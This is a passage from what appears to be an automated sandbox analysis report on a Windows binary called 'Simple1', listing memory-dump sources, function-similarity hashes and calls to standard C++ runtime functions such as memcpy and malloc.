              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
              • String ID:
              • API String ID: 1775671525-0
              • Opcode ID: ec63268d6026fec8c3c01620d9734fc28b0be693d76d74db511f0e55b27b6a49
              • Instruction ID: 01348310e8c51f30337b4e51b8011ba8db660ee4c84b65911f16a78421047721
              • Opcode Fuzzy Hash: ec63268d6026fec8c3c01620d9734fc28b0be693d76d74db511f0e55b27b6a49
              • Instruction Fuzzy Hash: 4451D363A08B8195EB10FF25D9046BDA3A0FB14BA8F944632DF2C27791DF38E695D350
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
              • String ID:
              • API String ID: 1155477157-0
              • Opcode ID: 2b8c79cdb3266eb39cf5aa1dd2f2519663dc420ae3e69cc0fff0188470da729c
              • Instruction ID: 7f3877371f94ecd29f0c1adbd3fde69e2d79aa95b092bf011088e5f654842bf2
              • Opcode Fuzzy Hash: 2b8c79cdb3266eb39cf5aa1dd2f2519663dc420ae3e69cc0fff0188470da729c
              • Instruction Fuzzy Hash: CB519022E08B5599EA10BF25D80477CB3A0FB55BA4F944A32DE2D273C5DF38E595C350
              APIs
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7CEA98E38), ref: 00007FF7CEA98580
                • Part of subcall function 00007FF7CEA9B508: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7CEA9107B), ref: 00007FF7CEA9B522
                • Part of subcall function 00007FF7CEA91310: ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF7CEA9131B
              • memcpy.VCRUNTIME140(?,?,?,00007FF7CEA98E38), ref: 00007FF7CEA985A1
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CEA985BC
                • Part of subcall function 00007FF7CEA91270: __std_exception_copy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CEA9B543), ref: 00007FF7CEA912B4
              • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,00007FF7CEA98E38), ref: 00007FF7CEA98625
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,00007FF7CEA98E38), ref: 00007FF7CEA9862E
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: D@std@@@std@@U?$char_traits@$??1?$basic_ios@??1?$basic_iostream@Concurrency::cancel_current_taskXlength_error@std@@__std_exception_copy_invalid_parameter_noinfo_noreturnmallocmemcpy
              • String ID:
              • API String ID: 2733788171-0
              • Opcode ID: 895c6813316c641382c5e3aa4b1084326639795824eb79dcb369539a11281871
              • Instruction ID: bc8cd051012f7a3f55cdd06eaaf1174d6f7648c67da1ee8b734fe6599c262cb0
              • Opcode Fuzzy Hash: 895c6813316c641382c5e3aa4b1084326639795824eb79dcb369539a11281871
              • Instruction Fuzzy Hash: 7141D532B05B4289EB58AF25E8407BCA390EB44BB4F948231DB2D177D6DE3CD8D58710
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: __current_exception__current_exception_contextterminate
              • String ID: csm
              • API String ID: 2542180945-1018135373
              • Opcode ID: d3b79f1d4ed2cf87534eefe888d4520da953d68ce7e88eb7b161ba8e8e1dee64
              • Instruction ID: e983f58333eda405dcfa35cacc91c7a5b365498bbab06e037fee09b3f11cb829
              • Opcode Fuzzy Hash: d3b79f1d4ed2cf87534eefe888d4520da953d68ce7e88eb7b161ba8e8e1dee64
              • Instruction Fuzzy Hash: 71F0CF37605B44CAD714AF21EC819AC73A4FB88BA8B8A5120FA4D57B55CF38D8908350
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
              • String ID:
              • API String ID: 1155477157-0
              • Opcode ID: eaf3c19ad4d0e686500c82fd6c9687f926ff04beca4be6b011ccc32704aa8542
              • Instruction ID: 0b415a2bca70ccad114db64dd769f44df4902c12beeb551e9258b752bc3f9419
              • Opcode Fuzzy Hash: eaf3c19ad4d0e686500c82fd6c9687f926ff04beca4be6b011ccc32704aa8542
              • Instruction Fuzzy Hash: 18311262B09A46ACFE14BF11A900BBD92919B04FF4F944631CA2D27BC5DE3CE481C328
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fed82e02baa9a700fae8dd61e3f5e5d4e6d578d09e70afdffe5bad35c6b6e123
              • Instruction ID: a1c4ec26a9ae5903d1cc01c0d8f65dcfe28e508d23d369e32bf4d820d57f6518
              • Opcode Fuzzy Hash: fed82e02baa9a700fae8dd61e3f5e5d4e6d578d09e70afdffe5bad35c6b6e123
              • Instruction Fuzzy Hash: BC517732708B8189DB109F29E85077DB7A5FB84BA4F944236EA9D97799DF3CC444C720
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: Concurrency::cancel_current_task
              • String ID:
              • API String ID: 118556049-0
              • Opcode ID: 1ef9cebed11aa757f790f007fe67e90c90a9a1ada4030d4e0cebe6aba601f67a
              • Instruction ID: 144837b3515bf9572559fcc7dbc38f6708f060ad05d9147448d34052ec8ced99
              • Opcode Fuzzy Hash: 1ef9cebed11aa757f790f007fe67e90c90a9a1ada4030d4e0cebe6aba601f67a
              • Instruction Fuzzy Hash: 5E21C661B1429A5DED183E774D05DBE96116F25FF0E784B31EE3C17BD2DD28E4428220
              APIs
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FF7CEA95133), ref: 00007FF7CEA99F3A
                • Part of subcall function 00007FF7CEA9B508: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7CEA9107B), ref: 00007FF7CEA9B522
              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF7CEA95133), ref: 00007FF7CEA99F65
              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF7CEA95133), ref: 00007FF7CEA99F75
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CEA99FA9
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
              • String ID:
              • API String ID: 1155477157-0
              • Opcode ID: fead59cf91176764882eea427c2a42ff201302449ae88b393c1fe2f54dd12570
              • Instruction ID: adc1fc903c2b63cf954f78466feee480aad7725019e608d19353901215cd695c
              • Opcode Fuzzy Hash: fead59cf91176764882eea427c2a42ff201302449ae88b393c1fe2f54dd12570
              • Instruction Fuzzy Hash: CA41B422B15A4195EA10EF12A84467DA394EB48BF0F958731EE7D577C4EE3CD481C314
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
              • String ID:
              • API String ID: 1155477157-0
              • Opcode ID: 34d6b8b8f85d502dd3e974caf13f3a255f62ba7057ab9783194fbc3a16eacf1c
              • Instruction ID: b93bc0e4c05a57d71764dfbeaed9ba01de5a483ca69f36f90090ad92fa35e0bd
              • Opcode Fuzzy Hash: 34d6b8b8f85d502dd3e974caf13f3a255f62ba7057ab9783194fbc3a16eacf1c
              • Instruction Fuzzy Hash: 5A31D562A0AB4199EE18BF11AC4067EA295EB15BB0F944B34DE7E177D0DF3CE4928350
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: memcpy$Concurrency::cancel_current_task
              • String ID:
              • API String ID: 326894585-0
              • Opcode ID: bb3c3e09e16725125c818d18fe87c36af5fe47e3bf638568bff9307805f37345
              • Instruction ID: ddc8d2a906926e1214837d5a5397925c15bf921902b367899ecdcc22fd4027db
              • Opcode Fuzzy Hash: bb3c3e09e16725125c818d18fe87c36af5fe47e3bf638568bff9307805f37345
              • Instruction Fuzzy Hash: 9421F822B0AB425DEE14BF11AC407BDA2909F157F4FA80A31DE6D1B7D6DE7CE5828310